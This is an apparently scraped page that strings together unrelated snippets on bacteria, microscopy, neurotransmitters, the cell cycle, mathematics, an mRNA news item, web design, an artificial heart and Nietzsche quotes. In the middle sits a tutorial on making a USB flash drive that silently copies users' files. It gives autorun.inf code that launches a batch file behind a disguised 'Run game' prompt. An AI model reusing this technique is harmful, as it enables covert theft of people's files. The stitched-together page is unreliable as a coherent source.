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Virtual Museum of Bacteria

Virtual Museum of Bacteria

Brief Answers to Cosmic Questions Structure of the Universe Does the Universe have an edge, beyond which there is nothing? Are the galaxies arranged on the surface of a sphere? Why can't we see the whole universe? Molecular Expressions Microscopy Primer: Introduction to Microscopy Introduction to Optical Microscopy,Digital Imaging, and Photomicrography This treatise on optical microscopy is divided into several sections that are available through the links displayed immediately to the left (in the darker navigational boxes) and below. In order to print the entire microscopy primer as a paper document, you must download each link independently, send the file to your printer, and put the results together. In the Bibliography, we have included links to other works on optical microscopy and our section on Web Resources contains links to other microscopy sites on the Internet. This material is targeted for educational purposes only, and is not available to be posted on remote websites (either commercial or educational) or distributed in any electronic format. Frequently Asked Questions - Mortimer Abramowitz, senior microscopist at Olympus America Inc., answers the 50 most commonly asked questions about microscopy and photomicrography.

49 Fascinating YouTube Videos to Learn About the Human Body As any doctor, nurse practitioner or other health care professional knows, the body is an interesting system. In many ways, it’s like a machine, with many complex parts. There is a lot to learn about the body and how it works, as well as how its different systems interact to create a larger system. Here are 49 interesting YouTube videos that can help you learn about the human body: Brain Neurological Control - Neurotransmitters - StumbleUpon Neurotransmitter Molecules Neurotransmitters can be broadly split into two groups – the ‘classical’, small molecule neurotransmitters and the relatively larger neuropeptide neurotransmitters. Within the category of small molecule neurotransmitters, the biogenic amines (dopamine, noradrenaline, serotonin and histamine) are often referred to as a discrete group because of their similarity in terms of their chemical properties. Click on the links in the table above to read more about some of the important neurotransmitters. Serotonin Although the CNS contains less than 2% of the total serotonin in the body, serotonin plays a very important role in a range of brain functions.

How to make flash drive that copy's users files silently and automatically Ok there is no order in the file creation process just that you have all files created and on the flash drive. I will start out with the autorun.inf. This file is used when you insert the flash drive into said computer. Also used to change the thumb drive icon to something more acceptable for social engineering. Here is the code, you will have to open a simple word editor such as word, you can past this code into word and edit to your hearts content. [autorun] icon=drive.icoopen=launch.bataction=Click ok to Run game for Windowsshell\open\command=launch.bat

Cell Cycle & Cytokinesis - Cell Cycle Regulation and the Control of Cell Proliferation (Cell Growth + Cell Division) Cell Cycle Research - General resource with links to relevant recent literature, news and job listings. (Ion Channel Media Group) Cell Division - Undergraduate-level lectures on cell division. (Cell Biology Lectures, Mark Hill, University of New South Wales, Australia) The Eukaryotic Cell Cycle and Cancer - Introduction to the eukaryotic cell cycle as it relates to the genetics of cancer. (Phillip McClean, North Dakota State University) (Just above Beginner's Level) ICRF FACS Laboratory Cell Cycle Analysis - Methods for cell cycle analysis using flow cytometry.

How Mathematics Can Make Smart People Dumb - Ben O'Neill Mathematics can sometimes make smart people dumb. Let me explain what I mean by this. I don't mean that it is dumb not to be good at mathematics. After all, mathematics is a highly abstract and challenging discipline requiring many years (decades even) of study, and there are plenty of very smart people who have little understanding of it, and little ability to use it. What I mean is that mathematics quite often bamboozles people into accepting very silly arguments — arguments that are so silly that if you stated them without draping them in mathematical negligee, you would instantly become an object of ridicule to all those people who flunked out at basic algebra back in high school. The danger of mathematical arguments is that a person can sometimes follow an absurd path of reasoning without being alerted to its absurdity, due to the fact that their mind is so lost in the verbiage of mathematical equations that their common sense fails to penetrate it. Select PROPERTIES you are looking for: About ThermoDex | List of Titles Indexed | Finding Thermodynamic Infomation (Guide) | Library Catalog ThermoDex contains records for selected printed and web-based compilations of thermochemical and thermophysical data for chemical compounds and other substances. You can select one or more compound types and link them to one or more property terms, and ThermoDex will return a list of handbooks that could contain these data. Due to copyright and technical considerations, the actual data are not contained in ThermoDex. ThermoDex is based primarily on the holdings of the Mallet Chemistry Library at the University of Texas at Austin.

Genetic green light By Fiona Macrae Updated: 07:27 GMT, 16 June 2011 Scientists have altered the ‘code of life’ in a breakthrough that could lead to cures for hundreds of devastating diseases. The discovery, hailed as ‘the new miracle of modern medicine’ could lead to ways of ending the symptoms and the pain caused by up to a third of genetic conditions. These include cystic fibrosis, Britain’s most common life-threatening inherited condition, haemophilia and Duchenne muscular dystrophy, an incurable condition that cripples 100 babies born in the UK every year. The excitement centres around mRNA - the 'cousin' of DNA that contains the genetic sequence used to make the proteins needed to keep our bodies working properly

The 10 Most Important Skills You Need to be a Web Designer Here are my top 10 web design skills that you WILL need to master to become an effective web designer. If you’re serious about mastering web design and marketing, check out the Pro Web Design Alliance. See how Jordan benefited from the course forum and Google hangout sessions to make his and his clients’ sites better. Artifiical Heart For decades, the quest for the perfect artificial heart has been wrought with many technical challenges that have made it difficult to design a device that mimics the living, pumping organ. But Drs. Billy Cohn and Bud Frazier of the Texas Heart Institute say that trying to copy the function of the living organ has been part of the problem. They’ve developed a non-beating, non-pumping machine that delivers blood through the body with the use of simple whirling rotors.

Search results for "Nietzsche" (showing 1-20 of 816 quotes) - StumbleUpon "For me, trees have always been the most penetrating preachers. I revere them when they live in tribes and families, in forests and groves. And even more I revere them when they stand alone. They are like lonely persons. Not like hermits who have stolen away out of some weakness, but like great, solitary men, like Beethoven and Nietzsche. In their highest boughs the world rustles, their roots rest in infinity; but they do not lose themselves there, they struggle with all the force of their lives for one thing only: to fulfil themselves according to their own laws, to build up their own form, to represent themselves.

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